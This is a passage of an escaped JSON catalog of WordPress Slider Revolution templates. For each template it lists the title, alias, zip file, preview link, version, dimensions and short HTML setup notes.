Gallery\",\"alias\":\"insta-gallery\",\"zip\":\"insta-gallery.zip\",\"uid\":\"711732b0d42ec2b57818a2b9b1d86cba\",\"img\":\"insta-gallery\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-instagram-gallery\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-instagram-gallery\",\"version\":\"1.0.1\",\"required\":\"5.0.5\",\"width\":\"640\",\"height\":\"640\",\"description\":\"<span class=\\\"ttm_content\\\">This slider is automatically populated by a Instagram stream. Just one slide is needed to show a whole feed!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">The content source is set to <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/module-content\\/#flickr\\\" target=\\\"_blank\\\">\\\"Instagram Stream\\\"<\\/a>. Make sure to input your correct API information in the slider settings.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"socialmedia\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"11\":{\"id\":\"12\",\"title\":\"Levano Restaurant Bar\",\"alias\":\"levanorestaurantbar\",\"zip\":\"levanorestaurantbar.zip\",\"uid\":\"4178f837db67d1b2eb6cb5840bbd0b42\",\"img\":\"levanorestaurantbar\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-front-page-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-front-page-template\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or bullets.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Instructions for <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/modify-burger-menu\\/\\\" target=\\\"_blank\\\">changing the menu<\\/a>.<\\/span><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"12\":{\"id\":\"13\",\"title\":\"Main Feature Slider\",\"alias\":\"mainfeature\",\"zip\":\"mainfeature.zip\",\"uid\":\"1e002a3230ab00095bedc6f60393ee7f\",\"img\":\"mainfeature\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=revolution.themepunch.com\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1230\",\"height\":\"750\",\"description\":\" <span class=\\\"ttm_content\\\">A slightly stripped down version of the main preview slider.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Just edit the slides to change images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"13\":{\"id\":\"14\",\"title\":\"Media Gallery Two\",\"alias\":\"media-gallery-two\",\"zip\":\"media-gallery-two.zip\",\"uid\":\"d002f1b1b55805f9322c264c5504ba5a\",\"img\":\"media-gallery-two\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-media-gallery-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-media-gallery-slider\",\"version\":\"1.0.1\",\"required\":\"6.2.22\",\"width\":\"1230\",\"height\":\"692\",\"description\":\"<span class=\\\"ttm_content\\\">A media gallery example with Vimeo, HTML5 and Youtube videos.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Just edit the slides to change media and titles.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"14\":{\"id\":\"15\",\"title\":\"Media Carousel Autoplay\",\"alias\":\"media-carousel-autoplay\",\"zip\":\"media-carousel-autoplay.zip\",\"uid\":\"393d7875b1cc9d933378b35e4f645d76\",\"img\":\"media-carousel-autoplay\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-media-gallery\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-media-gallery\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"720\",\"height\":\"405\",\"description\":\"<span class=\\\"ttm_content\\\">A media carousel with \\\"autoplay\\\" activated. Swipe or click tabs to navigate the slider.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Just edit the slides to change media and caption texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"15\":{\"id\":\"16\",\"title\":\"News Background Video\",\"alias\":\"news-background-video\",\"zip\":\"news-bg-video.zip\",\"uid\":\"a0efe44ac3af0f958b3f84c816a08272\",\"img\":\"news-bg-video\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-content-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-content-blocks\",\"version\":\"1.0.2\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"500\",\"description\":\"<span class=\\\"ttm_content\\\">A hero block with HTML5 background video that plays when entering the screen.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background video and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"16\":{\"id\":\"17\",\"title\":\"News Gallery\",\"alias\":\"news-gallery\",\"zip\":\"news-gallery.zip\",\"uid\":\"3a069c3b286dbb9ee435563f747e3300\",\"img\":\"news-gallery\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-news-rotator\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-news-rotator\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"500\",\"description\":\"<span class=\\\"ttm_content\\\">A news gallery slideshow with tab navigation. Great for any blog!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Just edit the slides to change images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"17\":{\"id\":\"18\",\"title\":\"News Gallery Post Based\",\"alias\":\"news-gallery-post-based\",\"zip\":\"news-gallery-post-based.zip\",\"uid\":\"32fe05b1039c29ab9420bfd15aec5488\",\"img\":\"news-gallery-post-based\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-post-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-post-slider\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"500\",\"description\":\"<span class=\\\"ttm_content\\\"> This slider is automatically populated by WordPress posts.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">The content source is set to <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/module-content\\/#flickr\\\" target=\\\"_blank\\\">\\\"Post-Based Slider\\\"<\\/a>. Make sure to select the post type you want to display in the slider settings.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"postbased\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"18\":{\"id\":\"19\",\"title\":\"News Hero\",\"alias\":\"news-hero\",\"zip\":\"news-hero.zip\",\"uid\":\"96a0385538a17c8c81ed8175740f70ea\",\"img\":\"news-hero\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-content-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-content-blocks\",\"version\":\"1.0.1\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"500\",\"description\":\"<span class=\\\"ttm_content\\\">A image hero block with ken burns effect.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background image and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"19\":{\"id\":\"20\",\"title\":\"News Video\",\"alias\":\"news-video\",\"zip\":\"news-video.zip\",\"uid\":\"f901e9e16e0363248156c2209eb584e9\",\"img\":\"news-video\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-content-blocks\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-content-blocks\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"500\",\"description\":\"<span class=\\\"ttm_content\\\">A Vimeo background video hero block with play \\/ pause buttons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the video and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"20\":{\"id\":\"21\",\"title\":\"Newsletter Hero\",\"alias\":\"newsletter-hero\",\"zip\":\"newsletter-hero.zip\",\"uid\":\"6290a9864d8c4c6311784586ed1cc5fe\",\"img\":\"newsletter-hero\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-newsletter-signup\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-newsletter-signup\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">This hero block uses a custom styled Mailchimp newsletter signup field.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background image, texts, and <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/how-to-setup-mailchimp-for-the-newsletter-hero-template\\/\\\" target=\\\"_blank\\\">Mailchimp code<\\/a>.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"21\":{\"id\":\"22\",\"title\":\"Not Generic\",\"alias\":\"notgeneric\",\"zip\":\"notgeneric.zip\",\"uid\":\"9d87ba95e02210a9f82387add2ceadf9\",\"img\":\"notgeneric\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-fullscreen-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-fullscreen-slider\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A full-screen slider with a layer based navigation and sleek content elements.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Instructions for <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/modify-burger-menu\\/\\\" target=\\\"_blank\\\">changing the menu<\\/a>.<\\/span><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"22\":{\"id\":\"23\",\"title\":\"Photography\",\"alias\":\"photography\",\"zip\":\"photography.zip\",\"uid\":\"1b2072547afb75e49f33b016751ed360\",\"img\":\"photography\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-photography-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-photography-slider\",\"version\":\"1.0.1\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the layer-based menu.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Instructions for <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/modify-burger-menu\\/\\\" target=\\\"_blank\\\">changing the menu<\\/a>.<\\/span><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"23\":{\"id\":\"24\",\"title\":\"Photography Carousel\",\"alias\":\"photography-carousel\",\"zip\":\"photography-carousel.zip\",\"uid\":\"9a84b859ba23dc49ba8784e3a86545fa\",\"img\":\"photography-carousel\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-photo-gallery\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-photo-gallery\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1024\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A front-page carousel that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the layer-based menu.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Instructions for <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/modify-burger-menu\\/\\\" target=\\\"_blank\\\">changing the menu<\\/a>.<\\/span><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"24\":{\"id\":\"25\",\"title\":\"Search Form Hero\",\"alias\":\"search-form-hero\",\"zip\":\"search-form-hero.zip\",\"uid\":\"e09eb1bd0f22b3a2b02a1aa251dd1f3e\",\"img\":\"search-form-hero\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-search-form-hero\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-search-form-hero\",\"version\":\"1.0.2\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">This hero block uses a custom styled input field to show search results on a WordPress site.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background image, texts, and search field code.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"25\":{\"id\":\"26\",\"title\":\"Showcase Carousel\",\"alias\":\"showcasecarousel\",\"zip\":\"showcasecarousel.zip\",\"uid\":\"c5ca218398331bd2c064efc2f62eae56\",\"img\":\"showcasecarousel\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-cover-flow-gallery\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-cover-flow-gallery\",\"version\":\"1.0.1\",\"required\":\"5.0.5\",\"width\":\"600\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">A fancy carousel that rotates, fades and scales slider items.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\\r\\n\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content carousel. Just edit the slides to change images and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"carousel\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"26\":{\"id\":\"27\",\"title\":\"Sports Hero\",\"alias\":\"sports-hero\",\"zip\":\"sportshero.zip\",\"uid\":\"8de7a145f32a362d618d2595ffa2f724\",\"img\":\"sportshero\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-image-hero\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-image-hero\",\"version\":\"1.0.2\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"720\",\"description\":\"<span class=\\\"ttm_content\\\">An sports themed image hero block with buttons.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background image and texts.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"28\":{\"id\":\"29\",\"title\":\"Vimeo Gallery\",\"alias\":\"vimeo-gallery\",\"zip\":\"vimeo-gallery.zip\",\"uid\":\"fa824ce1ff3942ec268fc9eda60df539\",\"img\":\"vimeo-gallery\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-vimeo-gallery\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-vimeo-gallery\",\"version\":\"1.0.1\",\"required\":\"5.0.5\",\"width\":\"1230\",\"height\":\"692\",\"description\":\"<span class=\\\"ttm_content\\\">This slider is automatically populated by a Vimeo stream. Just one slide is needed to show a whole feed!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">The content source is set to <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/module-content\\/#flickr\\\" target=\\\"_blank\\\">\\\"Vimeo Stream\\\"<\\/a>. Make sure to input your correct API information in the slider settings.<br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"socialmedia\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"29\":{\"id\":\"30\",\"title\":\"Vimeo Hero\",\"alias\":\"vimeohero\",\"zip\":\"vimeohero.zip\",\"uid\":\"c575575f96173d88589cddcb06120b77\",\"img\":\"vimeohero\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-hero-vimeo\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-hero-vimeo\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1240\",\"height\":\"600\",\"description\":\"<span class=\\\"ttm_content\\\">A commonly used Vimeo video background hero block.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content hero slider. Just edit the slide to change the background video and texts.<br\\/><br\\/><\\/span>\\r\\nScreencast for <a href=\\\"https:\\/\\/www.youtube.com\\/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\\\" target=\\\"_blank\\\">mobile video<\\/a> considerations.<\\/a>\\r\\n<br\\/><br\\/>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2016-02-24 13:21:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"30\":{\"id\":\"31\",\"title\":\"Web Product Dark\",\"alias\":\"web-product-dark\",\"zip\":\"web-product-dark.zip\",\"uid\":\"39b872cf0608e63c3a503e58374dc30a\",\"img\":\"web-product-dark\\/slider.jpg\",\"preview\":\"http:\\/\\/revolution.themepunch.com\\/wordpress-frontpage-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-frontpage-slider\",\"version\":\"1.0.0\",\"required\":\"5.0.5\",\"width\":\"1400\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the layer-based menu.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">This is a \\\"Default\\\" content slider. Edit the slides to change images and texts.<br\\/>Some content is in <a href=\\\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/global-layers\\/\\\" target=\\\"_blank\\\">\\\"Static \\/ Global Layers\\\"<\\/a><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Instructions for <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/modify-burger-menu\\/\\\" target=\\\"_blank\\\">changing the menu<\\/a>.<\\/span><br\\/><br\\/><\\/span>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic help.<\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2016-02-24 